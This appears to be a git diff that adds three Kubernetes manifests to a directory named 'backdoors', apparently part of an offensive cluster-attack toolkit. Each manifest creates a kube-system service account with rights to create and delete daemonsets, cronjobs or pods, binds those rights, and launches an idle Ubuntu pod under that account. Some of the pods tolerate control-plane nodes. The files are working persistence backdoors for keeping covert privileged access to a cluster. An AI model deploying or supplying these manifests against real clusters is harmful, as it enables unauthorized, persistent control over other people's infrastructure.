diff --git a/yamls/backdoors/create-delete-daemonsets-ns-role.yaml b/yamls/backdoors/create-delete-daemonsets-ns-role.yaml new file mode 100644 index 0000000..0397e84 --- /dev/null +++ b/yamls/backdoors/create-delete-daemonsets-ns-role.yaml @@ -0,0 +1,87 @@ +# create-delete-daemonsets-ns-role.yaml + +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: create-delete-daemonsets + namespace: kube-system + + +--- +# 当server版本为1或者大于16时候 +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: create-delete-daemonsets + namespace: kube-system +rules: +- apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - delete +- apiGroups: + - "" + resources: + - pods + - pods/log + verbs: + - get + - list + + +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: create-delete-daemonsets + namespace: kube-system + +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: create-delete-daemonsets +subjects: +- kind: ServiceAccount + name: create-delete-daemonsets + namespace: kube-system + +--- +apiVersion: v1 +kind: Pod +metadata: + labels: + name: create-delete-daemonsets + name: create-delete-daemonsets + namespace: kube-system + +spec: + containers: + - args: + - -c + - sleep 10000; + command: + - /bin/sh + image: ubuntu:18.04 + imagePullPolicy: IfNotPresent + name: create-delete-daemonsets + resources: + limits: + cpu: 100m + memory: 250Mi + requests: + cpu: 80m + memory: 50Mi + + serviceAccountName: create-delete-daemonsets + terminationGracePeriodSeconds: 600 + tolerations: + - effect: NoSchedule + key: node-role.kubernetes.io/control-plane + operator: Exists + - effect: NoSchedule + key: node-role.kubernetes.io/master + operator: Exists diff --git a/yamls/backdoors/k8s_backdoor_cronjob.yaml b/yamls/backdoors/k8s_backdoor_cronjob.yaml new file mode 100644 index 0000000..adc47d8 --- /dev/null +++ b/yamls/backdoors/k8s_backdoor_cronjob.yaml @@ -0,0 +1,57 @@ +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: k8s-backdoor-cronjob + namespace: kube-system +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: k8s-backdoor-cronjob +rules: +- apiGroups: + - batch + resources: + - cronjobs + - jobs + verbs: + - create + - delete + - get + - list +- apiGroups: + - "" + resources: + - pods + - pods/log + verbs: + - get + - list +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: k8s-backdoor-cronjob +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: k8s-backdoor-cronjob +subjects: +- kind: ServiceAccount + name: k8s-backdoor-cronjob + namespace: kube-system +--- +apiVersion: v1 +kind: Pod +metadata: + name: k8s-backdoor-cronjob + namespace: kube-system +spec: + serviceAccountName: k8s-backdoor-cronjob + containers: + - name: ubuntu + image: ubuntu:18.04 + imagePullPolicy: IfNotPresent + command: [ "/bin/bash", "-c", "--" ] + args: [ "while true; do sleep 30; done;" ] diff --git a/yamls/backdoors/lgdc-kube-system-pods-role.yaml b/yamls/backdoors/lgdc-kube-system-pods-role.yaml new file mode 100644 index 0000000..aa52b86 --- /dev/null +++ b/yamls/backdoors/lgdc-kube-system-pods-role.yaml @@ -0,0 +1,79 @@ +# lgdc-kube-system-pods-role + +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: lgdc-kube-system-pods + namespace: kube-system + +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: lgdc-kube-system-pods + namespace: kube-system + +rules: +- apiGroups: + - "" + resources: + - pods + verbs: + - list + - get + - delete + - create + +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: lgdc-kube-system-pods + namespace: kube-system + +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: lgdc-kube-system-pods +subjects: +- kind: ServiceAccount + name: lgdc-kube-system-pods + namespace: kube-system + +--- +apiVersion: v1 +kind: Pod +metadata: + labels: + name: lgdc-kube-system-pods-role + name: lgdc-kube-system-pods-role + namespace: kube-system + +spec: + containers: + - args: + - -c + - sleep 10000; + command: + - /bin/sh + image: ubuntu:18.04 + imagePullPolicy: IfNotPresent + name: lgdc-kube-system-pods-role + resources: + limits: + cpu: 100m + memory: 500Mi + requests: + cpu: 80m + memory: 50Mi + + serviceAccountName: lgdc-kube-system-pods + terminationGracePeriodSeconds: 600 + tolerations: + - effect: NoSchedule + key: node-role.kubernetes.io/control-plane + operator: Exists + - effect: NoSchedule + key: node-role.kubernetes.io/master + operator: Exists